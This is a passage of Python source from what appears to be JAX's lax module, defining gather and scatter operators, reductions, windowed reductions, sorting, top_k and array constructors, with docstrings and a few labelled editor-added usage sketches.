Describes the dimension number arguments to `XLA's Gather operator
<https://www.tensorflow.org/xla/operation_semantics#gather>`_. See the XLA
documentation for more details of what the dimension numbers mean.
Args:
offset_dims: the set of dimensions in the `gather` output that offset into
an array sliced from `operand`. Must be a tuple of integers in ascending
order, each representing a dimension number of the output.
collapsed_slice_dims: the set of dimensions `i` in `operand` that have
`slice_sizes[i] == 1` and that should not have a corresponding dimension
in the output of the gather. Must be a tuple of integers in ascending
order.
start_index_map: for each dimension in `start_indices`, gives the
corresponding dimension in `operand` that is to be sliced. Must be a
tuple of integers with size equal to `start_indices.shape[-1]`.
Unlike XLA's `GatherDimensionNumbers` structure, `index_vector_dim` is
implicit; there is always an index vector dimension and it must always be the
last dimension. To gather scalar indices, add a trailing dimension of size 1.
"""
offset_dims: Sequence[int]
collapsed_slice_dims: Sequence[int]
start_index_map: Sequence[int]
def gather(operand: Array, start_indices: Array,
dimension_numbers: GatherDimensionNumbers,
slice_sizes: Shape) -> Array:
"""Gather operator.
Wraps `XLA's Gather operator
<https://www.tensorflow.org/xla/operation_semantics#gather>`_.
The semantics of gather are complicated, and its API might change in the
future. For most use cases, you should prefer `Numpy-style indexing
<https://docs.scipy.org/doc/numpy-1.16.0/reference/arrays.indexing.html>`_
(e.g., `x[:, (1,4,7), ...]`), rather than using `gather` directly.
Args:
operand: an array from which slices should be taken
start_indices: the indices at which slices should be taken
dimension_numbers: a `lax.GatherDimensionNumbers` object that describes
how dimensions of `operand`, `start_indices` and the output relate.
slice_sizes: the size of each slice. Must be a sequence of non-negative
integers with length equal to `ndim(operand)`.
Returns:
An array containing the gather output.
"""
return gather_p.bind(
operand, start_indices, dimension_numbers=dimension_numbers,
slice_sizes=canonicalize_shape(slice_sizes))
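# [Editor's note] Editor-added sketch of a common gather pattern (equivalent to
# integer-array indexing on axis 0); not part of the original module, assumes
# `jax.numpy` is available.
def _example_gather_sketch():
  import jax.numpy as jnp
  operand = jnp.arange(5) * 10                  # [0, 10, 20, 30, 40]
  start_indices = jnp.array([[0], [2]])         # trailing index-vector dimension
  dnums = GatherDimensionNumbers(offset_dims=(),
                                 collapsed_slice_dims=(0,),
                                 start_index_map=(0,))
  out = gather(operand, start_indices, dnums, slice_sizes=(1,))
  assert out.tolist() == [0, 20]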
class ScatterDimensionNumbers(NamedTuple):
"""
Describes the dimension number arguments to `XLA's Scatter operator
<https://www.tensorflow.org/xla/operation_semantics#scatter>`_. See the XLA
documentation for more details of what the dimension numbers mean.
Args:
update_window_dims: the set of dimensions in the `updates` that are window
dimensions. Must be a tuple of integers in ascending
order, each representing a dimension number.
inserted_window_dims: the set of size 1 window dimensions that must be inserted
into the shape of `updates`. Must be a tuple of integers in ascending
order, each representing a dimension number of the output. These are the
mirror image of `collapsed_slice_dims` in the case of `gather`.
scatter_dims_to_operand_dims: for each dimension in `scatter_indices`, gives
the corresponding dimension in `operand`. Must be a sequence of integers
with size equal to indices.shape[-1].
Unlike XLA's `ScatterDimensionNumbers` structure, `index_vector_dim` is
implicit; there is always an index vector dimension and it must always be the
last dimension. To scatter scalar indices, add a trailing dimension of size 1.
"""
update_window_dims: Sequence[int]
inserted_window_dims: Sequence[int]
scatter_dims_to_operand_dims: Sequence[int]
def scatter_add(operand: Array, scatter_indices: Array, updates: Array,
dimension_numbers: ScatterDimensionNumbers, *,
indices_are_sorted: bool = False,
unique_indices: bool = False) -> Array:
"""Scatter-add operator.
Wraps `XLA's Scatter operator
<https://www.tensorflow.org/xla/operation_semantics#scatter>`_, where
addition is used to combine updates and values from `operand`.
The semantics of scatter are complicated and its API is subject to change.
Args:
operand: an array to which the scatter should be applied
scatter_indices: an array that gives the indices in `operand` to which each
update in `updates` should be applied.
updates: the updates that should be scattered onto `operand`.
dimension_numbers: a `lax.ScatterDimensionNumbers` object that describes
how dimensions of `operand`, `start_indices`, `updates` and the output
relate.
indices_are_sorted: whether `scatter_indices` is known to be sorted. If
true, may improve performance on some backends.
unique_indices: whether the indices to be updated in ``operand`` are
guaranteed to not overlap with each other. If true, may improve performance on
some backends.
Returns:
An array containing the sum of `operand` and the scattered updates.
"""
jaxpr, consts = _reduction_jaxpr(add, _abstractify(_const(operand, 0)))
return scatter_add_p.bind(
operand, scatter_indices, updates, update_jaxpr=jaxpr,
update_consts=consts, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
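# [Editor's note] Editor-added sketch of scalar scatter-add into a 1-D operand;
# not part of the original module, assumes `jax.numpy` is available.
def _example_scatter_add_sketch():
  import jax.numpy as jnp
  operand = jnp.zeros(5)
  indices = jnp.array([[1], [3], [1]])          # trailing index-vector dimension
  updates = jnp.array([1., 2., 3.])
  dnums = ScatterDimensionNumbers(update_window_dims=(),
                                  inserted_window_dims=(0,),
                                  scatter_dims_to_operand_dims=(0,))
  out = scatter_add(operand, indices, updates, dnums)
  assert out.tolist() == [0., 4., 0., 2., 0.]   # duplicate index 1 accumulates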
def scatter_mul(operand: Array, scatter_indices: Array, updates: Array,
dimension_numbers: ScatterDimensionNumbers, *,
indices_are_sorted: bool = False,
unique_indices: bool = False) -> Array:
"""Scatter-multiply operator.
Wraps `XLA's Scatter operator
<https://www.tensorflow.org/xla/operation_semantics#scatter>`_, where
multiplication is used to combine updates and values from `operand`.
The semantics of scatter are complicated and its API is subject to change.
Args:
operand: an array to which the scatter should be applied
scatter_indices: an array that gives the indices in `operand` to which each
update in `updates` should be applied.
updates: the updates that should be scattered onto `operand`.
dimension_numbers: a `lax.ScatterDimensionNumbers` object that describes
how dimensions of `operand`, `start_indices`, `updates` and the output
relate.
indices_are_sorted: whether `scatter_indices` is known to be sorted. If
true, may improve performance on some backends.
unique_indices: whether the indices to be updated in ``operand`` are
guaranteed to not overlap with each other. If true, may improve performance on
some backends.
Returns:
An array containing `operand` with values at the scattered indices multiplied
by the corresponding updates.
"""
jaxpr, consts = _reduction_jaxpr(mul, _abstractify(_const(operand, 1)))
return scatter_mul_p.bind(
operand, scatter_indices, updates, update_jaxpr=jaxpr,
update_consts=consts, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
def scatter_min(operand: Array, scatter_indices: Array, updates: Array,
dimension_numbers: ScatterDimensionNumbers, *,
indices_are_sorted: bool = False,
unique_indices: bool = False) -> Array:
"""Scatter-min operator.
Wraps `XLA's Scatter operator
<https://www.tensorflow.org/xla/operation_semantics#scatter>`_, where
the `min` function is used to combine updates and values from `operand`.
The semantics of scatter are complicated and its API is subject to change.
Args:
operand: an array to which the scatter should be applied
scatter_indices: an array that gives the indices in `operand` to which each
update in `updates` should be applied.
updates: the updates that should be scattered onto `operand`.
dimension_numbers: a `lax.ScatterDimensionNumbers` object that describes
how dimensions of `operand`, `start_indices`, `updates` and the output
relate.
indices_are_sorted: whether `scatter_indices` is known to be sorted. If
true, may improve performance on some backends.
unique_indices: whether the indices to be updated in ``operand`` are
guaranteed to not overlap with each other. If true, may improve performance on
some backends.
Returns:
An array containing `operand` with values at the scattered indices replaced by
the minimum of the original value and the corresponding update.
"""
jaxpr, consts = _reduction_jaxpr(min, _abstractify(_const(operand, 0)))
return scatter_min_p.bind(
operand, scatter_indices, updates, update_jaxpr=jaxpr,
update_consts=consts, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
def scatter_max(operand: Array, scatter_indices: Array, updates: Array,
dimension_numbers: ScatterDimensionNumbers, *,
indices_are_sorted: bool = False,
unique_indices: bool = False) -> Array:
"""Scatter-max operator.
Wraps `XLA's Scatter operator
<https://www.tensorflow.org/xla/operation_semantics#scatter>`_, where
the `max` function is used to combine updates and values from `operand`.
The semantics of scatter are complicated and its API is subject to change.
Args:
operand: an array to which the scatter should be applied
scatter_indices: an array that gives the indices in `operand` to which each
update in `updates` should be applied.
updates: the updates that should be scattered onto `operand`.
dimension_numbers: a `lax.ScatterDimensionNumbers` object that describes
how dimensions of `operand`, `start_indices`, `updates` and the output
relate.
indices_are_sorted: whether `scatter_indices` is known to be sorted. If
true, may improve performance on some backends.
unique_indices: whether the indices to be updated in ``operand`` are
guaranteed to not overlap with each other. If true, may improve performance on
some backends.
Returns:
An array containing `operand` with values at the scattered indices replaced by
the maximum of the original value and the corresponding update.
"""
jaxpr, consts = _reduction_jaxpr(max, _abstractify(_const(operand, 0)))
return scatter_max_p.bind(
operand, scatter_indices, updates, update_jaxpr=jaxpr,
update_consts=consts, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
# Define this outside of scatter to ensure cache hits.
_scatter_reduction_computation = lambda x, y: y
def scatter(operand: Array, scatter_indices: Array, updates: Array,
dimension_numbers: ScatterDimensionNumbers, *,
indices_are_sorted: bool = False,
unique_indices: bool = False) -> Array:
"""Scatter-update operator.
Wraps `XLA's Scatter operator
<https://www.tensorflow.org/xla/operation_semantics#scatter>`_, where updates
replace values from `operand`.
If multiple updates are performed to the same index of operand, they may be
applied in any order.
The semantics of scatter are complicated and its API is subject to change.
Args:
operand: an array to which the scatter should be applied
scatter_indices: an array that gives the indices in `operand` to which each
update in `updates` should be applied.
updates: the updates that should be scattered onto `operand`.
dimension_numbers: a `lax.ScatterDimensionNumbers` object that describes
how dimensions of `operand`, `start_indices`, `updates` and the output
relate.
indices_are_sorted: whether `scatter_indices` is known to be sorted. If
true, may improve performance on some backends.
unique_indices: whether the indices to be updated in ``operand`` are
guaranteed to not overlap with each other. If true, may improve performance on
some backends.
Returns:
An array containing `operand` with values at the scattered indices replaced by
the corresponding updates.
"""
jaxpr, consts = _reduction_jaxpr(_scatter_reduction_computation,
_abstractify(_const(operand, 0)))
return scatter_p.bind(
operand, scatter_indices, updates, update_jaxpr=jaxpr,
update_consts=consts, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
def index_take(src: Array, idxs: Array, axes: Sequence[int]) -> Array:
indices = concatenate([expand_dims(i, (1,)) for i in idxs], 1)
indices = indices % np.array([src.shape[ax] for ax in axes])
slice_sizes = list(src.shape)
for ax in axes:
slice_sizes[ax] = 1
offset_dims = tuple(range(1, src.ndim - indices.shape[1] + 1))
dnums = GatherDimensionNumbers(
offset_dims=offset_dims,
collapsed_slice_dims=axes,
start_index_map=axes)
return gather(src, indices, dimension_numbers=dnums,
slice_sizes=tuple(slice_sizes))
def transpose(operand: Array, permutation: Sequence[int]) -> Array:
"""Wraps XLA's `Transpose
<https://www.tensorflow.org/xla/operation_semantics#transpose>`_
operator.
"""
permutation = tuple(permutation)
if permutation == tuple(range(len(permutation))):
return operand
else:
return transpose_p.bind(operand, permutation=permutation)
def argmin(operand: Array, axis: int,
index_dtype: DType) -> Tuple[Array, Array]:
"""Computes the index of the minimum element along ``axis``."""
return argmin_p.bind(operand, axes=(axis,),
index_dtype=dtypes.canonicalize_dtype(index_dtype))
def argmax(operand: Array, axis: int,
index_dtype: DType) -> Tuple[Array, Array]:
"""Computes the index of the maximum element along ``axis``."""
return argmax_p.bind(operand, axes=(axis,),
index_dtype=dtypes.canonicalize_dtype(index_dtype))
def reduce(operands: Array, init_values: Array, computation: Callable,
dimensions: Sequence[int]) -> Array:
"""Wraps XLA's `Reduce
<https://www.tensorflow.org/xla/operation_semantics#reduce>`_
operator.
``init_values`` and ``computation`` together must form a `monoid
<https://en.wikipedia.org/wiki/Monoid>`_
for correctness. That is, ``init_values`` must be an identity of
``computation``, and ``computation`` must be associative. XLA may exploit both
of these properties during code generation; if either is violated the result
is undefined.
"""
flat_operands, operand_tree = tree_util.tree_flatten(operands)
flat_init_values, init_value_tree = tree_util.tree_flatten(init_values)
if operand_tree != init_value_tree:
raise ValueError('Operands must have the same tree structure as init_values:'
f' {operand_tree} vs. {init_value_tree}')
if len(flat_operands) != len(flat_init_values):
raise ValueError('Must have same total number of operands as init_values: '
f' {len(flat_operands)} vs. {len(flat_init_values)}')
monoid_reducer = _get_monoid_reducer(computation, flat_init_values)
if monoid_reducer:
# monoid reducers bypass the weak_type_rule, so we set it explicitly.
weak_type = dtypes.is_weakly_typed(*flat_operands) and dtypes.is_weakly_typed(*flat_init_values)
return convert_element_type(monoid_reducer(*flat_operands, dimensions), weak_type=weak_type)
else:
flat_init_avals = safe_map(_abstractify, flat_init_values)
jaxpr, consts, out_tree = _variadic_reduction_jaxpr(
computation, tuple(flat_init_avals), init_value_tree)
out = reduce_p.bind(*(flat_operands + flat_init_values), computation=computation,
jaxpr=jaxpr, consts=consts, dimensions=tuple(dimensions))
return tree_util.tree_unflatten(out_tree, out)
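# [Editor's note] Editor-added sketch showing the monoid requirement in practice
# (`add` with identity 0); not part of the original module, assumes `jax.numpy`
# is available.
def _example_reduce_sketch():
  import jax.numpy as jnp
  x = jnp.arange(6, dtype=jnp.float32).reshape(2, 3)
  out = reduce(x, 0., add, (1,))                # sum along axis 1
  assert out.tolist() == [3., 12.]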
@cache()
def _reduction_jaxpr(computation, aval):
pval = pe.PartialVal.unknown(aval)
@lu.wrap_init
def comp(x, y):
result = computation(x, y)
if not (isinstance(result, core.Tracer) or core.valid_jaxtype(result)):
raise ValueError(
f"Invalid return type from reduction function: {type(result)}\n"
f"Reduction functions should only return an array.\n"
f"Full return value: {result}")
return (result,)
jaxpr, _, consts = pe.trace_to_jaxpr(comp, (pval, pval), instantiate=False)
return jaxpr, consts
@cache()
def _variadic_reduction_jaxpr(computation, flat_avals, aval_tree):
avals = tree_util.tree_unflatten(aval_tree, flat_avals)
flat_in_avals, in_tree = tree_util.tree_flatten((avals, avals))
pvals = safe_map(pe.PartialVal.unknown, flat_in_avals)
comp = lu.wrap_init(computation)
flat_comp, out_tree = api_util.flatten_fun_nokwargs(comp, in_tree)
jaxpr, _, consts = pe.trace_to_jaxpr(flat_comp, tuple(pvals),
instantiate=False)
return jaxpr, consts, out_tree()
def _get_monoid_reducer(monoid_op: Callable, xs: Array) -> Optional[Callable]:
if len(xs) != 1:
return None
x, = xs
aval = core.get_aval(x)
dtype = _dtype(x)
if (type(aval) is ConcreteArray) and aval.shape == ():
if monoid_op is add:
return np.equal(aval.val, 0) and partial(_reduce_sum)
elif monoid_op is mul:
return np.equal(aval.val, 1) and _reduce_prod
elif monoid_op is bitwise_or and dtype == np.bool_:
return np.equal(aval.val, _get_max_identity(dtype)) and _reduce_or
elif monoid_op is bitwise_and and dtype == np.bool_:
return np.equal(aval.val, _get_min_identity(dtype)) and _reduce_and
elif monoid_op is max:
return np.equal(aval.val, _get_max_identity(dtype)) and _reduce_max
elif monoid_op is min:
return np.equal(aval.val, _get_min_identity(dtype)) and _reduce_min
return None
def _get_max_identity(dtype: DType) -> Array:
if dtypes.issubdtype(dtype, np.inexact):
return np.array(-np.inf, dtype)
elif dtypes.issubdtype(dtype, np.integer):
return np.array(dtypes.iinfo(dtype).min, dtype)
elif dtypes.issubdtype(dtype, np.bool_):
return np.array(False, np.bool_)
def _get_min_identity(dtype: DType) -> Array:
if dtypes.issubdtype(dtype, np.inexact):
return np.array(np.inf, dtype)
elif dtypes.issubdtype(dtype, np.integer):
return np.array(dtypes.iinfo(dtype).max, dtype)
elif dtypes.issubdtype(dtype, np.bool_):
return np.array(True, np.bool_)
def _reduce_sum(operand: Array, axes: Sequence[int]) -> Array:
return reduce_sum_p.bind(operand, axes=tuple(axes))
def _reduce_prod(operand: Array, axes: Sequence[int]) -> Array:
return reduce_prod_p.bind(operand, axes=tuple(axes))
def _reduce_max(operand: Array, axes: Sequence[int]) -> Array:
return reduce_max_p.bind(operand, axes=tuple(axes))
def _reduce_min(operand: Array, axes: Sequence[int]) -> Array:
return reduce_min_p.bind(operand, axes=tuple(axes))
def _reduce_or(operand: Array, axes: Sequence[int]) -> Array:
return reduce_or_p.bind(operand, axes=tuple(axes))
def _reduce_and(operand: Array, axes: Sequence[int]) -> Array:
return reduce_and_p.bind(operand, axes=tuple(axes))
def reduce_window(operand: Array, init_value: Array, computation: Callable,
window_dimensions: Shape, window_strides: Sequence[int],
padding: Union[str, Sequence[Tuple[int, int]]],
base_dilation: Optional[Sequence[int]] = None,
window_dilation: Optional[Sequence[int]] = None) -> Array:
"""Wraps XLA's `ReduceWindowWithGeneralPadding
<https://www.tensorflow.org/xla/operation_semantics#reducewindow>`_
operator.
"""
if isinstance(padding, str):
dilated_window_dims = (window_dimensions if window_dilation is None else
_dilate_shape(window_dimensions, window_dilation))
padding = tuple(padtype_to_pads(operand.shape, dilated_window_dims,
window_strides, padding))
else:
padding = tuple(padding)
if base_dilation is None:
base_dilation = (1,) * len(window_dimensions)
if window_dilation is None:
window_dilation = (1,) * len(window_dimensions)
monoid_reducer = _get_monoid_window_reducer(computation, init_value)
if monoid_reducer:
return monoid_reducer(operand, window_dimensions, window_strides, padding,
base_dilation, window_dilation)
else:
jaxpr, consts = _reduction_jaxpr(computation, _abstractify(init_value))
return reduce_window_p.bind(
operand, init_value, jaxpr=jaxpr, consts=consts,
window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=padding,
base_dilation=tuple(base_dilation),
window_dilation=tuple(window_dilation))
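# [Editor's note] Editor-added sketch of a windowed sum; not part of the
# original module, assumes `jax.numpy` is available.
def _example_reduce_window_sketch():
  import jax.numpy as jnp
  x = jnp.arange(6, dtype=jnp.float32)
  # Sum over sliding windows of length 2, stride 1, no padding.
  out = reduce_window(x, 0., add, (2,), (1,), 'VALID')
  assert out.tolist() == [1., 3., 5., 7., 9.]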
def _get_monoid_window_reducer(monoid_op: Callable, x: Array) -> Optional[Callable]:
aval = core.get_aval(x)
if (type(aval) is ConcreteArray) and aval.shape == ():
if monoid_op is add:
return aval.val == 0 and _reduce_window_sum
elif monoid_op is max:
return aval.val == _get_max_identity(aval.dtype) and _reduce_window_max
elif monoid_op is min:
return aval.val == _get_min_identity(aval.dtype) and _reduce_window_min
return None
def _reduce_window_sum(operand: Array, window_dimensions: Shape,
window_strides: Sequence[int],
padding: Sequence[Tuple[int, int]],
base_dilation: Optional[Sequence[int]] = None,
window_dilation: Optional[Sequence[int]] = None) -> Array:
if base_dilation is None:
base_dilation = (1,) * len(window_dimensions)
if window_dilation is None:
window_dilation = (1,) * len(window_dimensions)
return reduce_window_sum_p.bind(
operand, window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=tuple(padding),
base_dilation=tuple(base_dilation),
window_dilation=tuple(window_dilation))
def _reduce_window_prod(operand: Array, window_dimensions: Shape,
window_strides: Sequence[int],
padding: Sequence[Tuple[int, int]],
base_dilation: Optional[Sequence[int]] = None,
window_dilation: Optional[Sequence[int]] = None) -> Array:
init_value = _const(operand, 1)
jaxpr, consts = _reduction_jaxpr(mul, _abstractify(init_value))
if base_dilation is None:
base_dilation = (1,) * len(window_dimensions)
if window_dilation is None:
window_dilation = (1,) * len(window_dimensions)
return reduce_window_p.bind(
operand, init_value, jaxpr=jaxpr, consts=consts,
window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=tuple(padding),
base_dilation=tuple(base_dilation),
window_dilation=tuple(window_dilation))
def _reduce_window_max(operand: Array, window_dimensions: Shape,
window_strides: Sequence[int],
padding: Sequence[Tuple[int, int]],
base_dilation: Optional[Sequence[int]] = None,
window_dilation: Optional[Sequence[int]] = None) -> Array:
if base_dilation is None:
base_dilation = (1,) * len(window_dimensions)
if window_dilation is None:
window_dilation = (1,) * len(window_dimensions)
return reduce_window_max_p.bind(
operand, window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=tuple(padding),
base_dilation=tuple(base_dilation),
window_dilation=tuple(window_dilation))
def _reduce_window_min(operand: Array, window_dimensions: Shape,
window_strides: Sequence[int],
padding: Sequence[Tuple[int, int]],
base_dilation: Optional[Sequence[int]] = None,
window_dilation: Optional[Sequence[int]] = None) -> Array:
if base_dilation is None:
base_dilation = (1,) * len(window_dimensions)
if window_dilation is None:
window_dilation = (1,) * len(window_dimensions)
return reduce_window_min_p.bind(
operand, window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=tuple(padding),
base_dilation=tuple(base_dilation),
window_dilation=tuple(window_dilation))
def _select_and_scatter(operand: Array, select: Callable,
window_dimensions: Shape, window_strides: Sequence[int],
padding: Sequence[Tuple[int, int]], source: Array,
init_value: Array, scatter: Callable,
base_dilation: Sequence[int],
window_dilation: Sequence[int]) -> Array:
select_jaxpr, select_consts = _reduction_jaxpr(select, _abstractify(init_value))
scatter_jaxpr, scatter_consts = _reduction_jaxpr(scatter, _abstractify(init_value))
return select_and_scatter_p.bind(
operand, source, init_value, select_jaxpr=select_jaxpr,
select_consts=select_consts, scatter_jaxpr=scatter_jaxpr,
scatter_consts=scatter_consts, window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=tuple(padding),
base_dilation=tuple(base_dilation),
window_dilation=tuple(window_dilation))
def _select_and_scatter_add(source: Array, operand: Array,
select_prim: core.Primitive,
window_dimensions: Shape,
window_strides: Sequence[int],
padding: Sequence[Tuple[int, int]]) -> Array:
return select_and_scatter_add_p.bind(
source, operand, select_prim=select_prim,
window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=tuple(padding))
def _select_and_gather_add(tangents: Array, operand: Array,
select_prim: core.Primitive,
window_dimensions: Shape,
window_strides: Sequence[int],
padding: Sequence[Tuple[int, int]],
base_dilation: Sequence[int],
window_dilation: Sequence[int]) -> Array:
"""Extracts the tangent corresponding to the minimum or maximum element in each
window of the `operand` array.
Wraps XLA's `ReduceWindow
<https://www.tensorflow.org/xla/operation_semantics#reducewindow>`_
operator, which applies a reduction function to all elements in each window of the
input multi-dimensional array. In this case, the input multi-dimensional array is
built by packing each element in the `operand` array with its corresponding
element in the `tangents` array.
Args:
tangents: an array
operand: an array with the same shape as `tangents`
select_prim: a reduction function (restricted to `ge_p` and `le_p`)
window_dimensions: an array of integers for window dimension values
window_strides: an array of integers for window stride values
padding: a sequence of (low, high) integer padding pairs, one per window dimension
base_dilation: an array of integers for base dilation values
window_dilation: an array of integers for window dilation values
Returns:
An array containing the elements in `tangents` corresponding to the output of the
reduction of `operand` in each window.
"""
return select_and_gather_add_p.bind(
tangents, operand, select_prim=select_prim,
window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=tuple(padding),
base_dilation=tuple(base_dilation),
window_dilation=tuple(window_dilation))
def sort(operand: Union[Array, Sequence[Array]], dimension: int = -1,
is_stable: bool = True, num_keys: int = 1) -> Union[Array, Tuple[Array, ...]]:
"""Wraps XLA's `Sort
<https://www.tensorflow.org/xla/operation_semantics#sort>`_
operator.
Args:
operand : Array or sequence of arrays
dimension : integer dimension along which to sort. Default: -1.
is_stable : boolean specifying whether to use a stable sort. Default: True.
num_keys : number of operands to treat as sort keys. Default: 1.
For num_keys > 1, the sort order will be determined lexicographically using
the first `num_keys` arrays, with the first key being primary.
The remaining operands will be returned with the same permutation.
Returns:
operand : sorted version of the input or inputs.
"""
if isinstance(operand, Sequence):
if len(operand) == 0:
raise TypeError("Sort requires at least one operand")
if not (1 <= num_keys <= len(operand)):
raise ValueError(f"num_keys={num_keys} must be between 1 and len(operand)={len(operand)}")
dimension = canonicalize_axis(dimension, len(operand[0].shape))
return tuple(sort_p.bind(*operand, dimension=dimension,
is_stable=is_stable,
num_keys=num_keys))
else:
if num_keys != 1:
raise ValueError(f"num_keys={num_keys} must equal 1 for a single operand.")
dimension = canonicalize_axis(dimension, len(operand.shape))
return sort_p.bind(operand, dimension=dimension, is_stable=is_stable, num_keys=1)[0]
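# [Editor's note] Editor-added sketch of a stable key/value sort via the
# multi-operand form; not part of the original module, assumes `jax.numpy`
# is available.
def _example_sort_sketch():
  import jax.numpy as jnp
  keys = jnp.array([2, 1, 1])
  vals = jnp.array([10, 20, 30])
  sorted_keys, permuted_vals = sort((keys, vals), num_keys=1)
  assert sorted_keys.tolist() == [1, 1, 2]      # stable: ties keep input order
  assert permuted_vals.tolist() == [20, 30, 10]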
def sort_key_val(keys: Array, values: Array, dimension: int = -1,
is_stable: bool = True) -> Tuple[Array, Array]:
"""Sorts ``keys`` along ``dimension`` and applies same permutation to ``values``."""
dimension = canonicalize_axis(dimension, len(keys.shape))
k, v = sort_p.bind(keys, values, dimension=dimension, is_stable=is_stable, num_keys=1)
return k, v
def top_k(operand: Array, k: int) -> Tuple[Array, Array]:
"""Returns top ``k`` values and their indices along the last axis of ``operand``."""
k = int(k)
if k < 0:
raise ValueError("k argument to top_k must be nonnegative, got {}".format(k))
return top_k_p.bind(operand, k=k)
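# [Editor's note] Illustrative sketch only (not part of the original module),
# assuming `jax.numpy` is available; the helper name is hypothetical.
def _example_top_k_sketch():
  import jax.numpy as jnp
  values, indices = top_k(jnp.array([1., 5., 3.]), 2)
  assert values.tolist() == [5., 3.]
  assert indices.tolist() == [1, 2]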
def tie_in(x: Array, y: Array) -> Array:
"""Deprecated. Ignores ``x`` and returns ``y``."""
return y
def full(shape: Shape, fill_value: Array, dtype: Optional[DType] = None) -> Array:
"""Returns an array of `shape` filled with `fill_value`.
Args:
shape: sequence of integers, describing the shape of the output array.
fill_value: the value to fill the new array with.
dtype: the type of the output array, or `None`. If not `None`, `fill_value`
will be cast to `dtype`.
"""
shape = canonicalize_shape(shape)
if np.shape(fill_value):
msg = "full must be called with scalar fill_value, got fill_value.shape {}."
raise TypeError(msg.format(np.shape(fill_value)))
weak_type = dtype is None and dtypes.is_weakly_typed(fill_value)
dtype = dtypes.canonicalize_dtype(dtype or _dtype(fill_value))
fill_value = convert_element_type(fill_value, dtype, weak_type)
return broadcast(fill_value, shape)
def _device_put_raw(x, weak_type=None):
if isinstance(x, xla.DeviceArray):
return x
else:
aval = raise_to_shaped(core.get_aval(x), weak_type=weak_type)
return xla.array_result_handler(None, aval)(*xla.device_put(x))
def iota(dtype: DType, size: int) -> Array:
"""Wraps XLA's `Iota
<https://www.tensorflow.org/xla/operation_semantics#iota>`_
operator.
"""
if config.omnistaging_enabled:
dtype = dtypes.canonicalize_dtype(dtype)
size = core.concrete_or_error(int, size, "size argument of lax.iota")
return iota_p.bind(dtype=dtype, shape=(size,), dimension=0)
else:
size = size if type(size) is masking.Poly else int(size)
shape = canonicalize_shape((size,))
dtype = dtypes.canonicalize_dtype(dtype)
lazy_expr = lazy.iota(dtype, shape[0])
aval = ShapedArray(shape, dtype)
return xla._DeviceArray(aval, None, lazy_expr, xla.DeviceConstant())
def broadcasted_iota(dtype: DType, shape: Shape, dimension: int) -> Array:
"""Convenience wrapper around ``iota``."""
dtype = dtypes.canonicalize_dtype(dtype)
shape = canonicalize_shape(shape)
dimension = core.concrete_or_error(
int, dimension, "dimension argument of lax.broadcasted_iota")
return iota_p.bind(dtype=dtype, shape=shape, dimension=dimension)
def _eye(dtype: DType, shape: Shape, offset: int) -> Array:
"""Like numpy.eye, create a 2D array with ones on a diagonal."""
N, M = tuple(map(int, shape))
offset = int(offset)
dtype = dtypes.canonicalize_dtype(dtype)
if config.omnistaging_enabled:
bool_eye = eq(add(broadcasted_iota(np.int32, (N, M), 0), np.int32(offset)),
broadcasted_iota(np.int32, (N, M), 1))
return convert_element_type_p.bind(bool_eye, new_dtype=dtype, weak_type=False)
else:
lazy_expr = lazy.eye(dtype, (N, M), offset)
aval = ShapedArray((N, M), dtype)
return xla._DeviceArray(aval, None, lazy_expr, xla.DeviceConstant())
def _delta(dtype: DType, shape: Shape, axes: Sequence[int]) -> Array:
"""This utility function exists for creating Kronecker delta arrays."""
shape = tuple(map(int, shape))
axes = tuple(map(int, axes))
dtype = dtypes.canonicalize_dtype(dtype)
base_shape = tuple(np.take(shape, axes)) # type: ignore[arg-type]
if config.omnistaging_enabled:
iotas = [broadcasted_iota(np.uint32, base_shape, i)
for i in range(len(base_shape))]
eyes = [eq(i1, i2) for i1, i2 in zip(iotas[:-1], iotas[1:])]
result = convert_element_type_p.bind(_reduce(operator.and_, eyes), new_dtype=dtype, weak_type=False)
return broadcast_in_dim(result, shape, axes)
else:
lazy_expr = lazy.broadcast(lazy.delta(dtype, base_shape), shape, axes)
aval = ShapedArray(shape, dtype)
return xla._DeviceArray(aval, None, lazy_expr, xla.DeviceConstant())
def _tri(dtype: DType, shape: Shape, offset: int) -> Array:
"""Like numpy.tri, create a 2D array with ones below a diagonal."""
N, M = tuple(map(int, shape))
offset = int(offset)
dtype = dtypes.canonicalize_dtype(dtype)
if config.omnistaging_enabled:
bool_tri = ge(add(broadcasted_iota(np.int32, (N, M), 0), np.int32(offset)),
broadcasted_iota(np.int32, (N, M), 1))
return convert_element_type_p.bind(bool_tri, new_dtype=dtype, weak_type=False)
else:
lazy_expr = lazy.tri(dtype, (N, M), offset)
aval = ShapedArray((N, M), dtype)
return xla._DeviceArray(aval, None, lazy_expr, xla.DeviceConstant())
def stop_gradient(x):
"""Stops gradient computation.
Operationally ``stop_gradient`` is the identity function, that is, it returns
argument `x` unchanged. However, ``stop_gradient`` prevents the flow of
gradients during forward or reverse-mode automatic differentiation. If there
are multiple nested gradient computations, ``stop_gradient`` stops gradients
for all of them.
For example:
>>> jax.grad(lambda x: x**2)(3.)
array(6., dtype=float32)
>>> jax.grad(lambda x: jax.lax.stop_gradient(x)**2)(3.)
array(0., dtype=float32)
>>> jax.grad(jax.grad(lambda x: x**2))(3.)
array(2., dtype=float32)
>>> jax.grad(jax.grad(lambda x: jax.lax.stop_gradient(x)**2))(3.)
array(0., dtype=float32)
"""
def stop(x):
if (dtypes.issubdtype(_dtype(x), np.floating) or
dtypes.issubdtype(_dtype(x), np.complexfloating)):
return ad_util.stop_gradient_p.bind(x)
else:
return x # only bind primitive on inexact dtypes, to avoid some staging
return tree_map(stop, x)
### convenience wrappers around traceables
def conv(lhs: Array, rhs: Array, window_strides: Sequence[int],
padding: str, precision: PrecisionLike = None) -> Array:
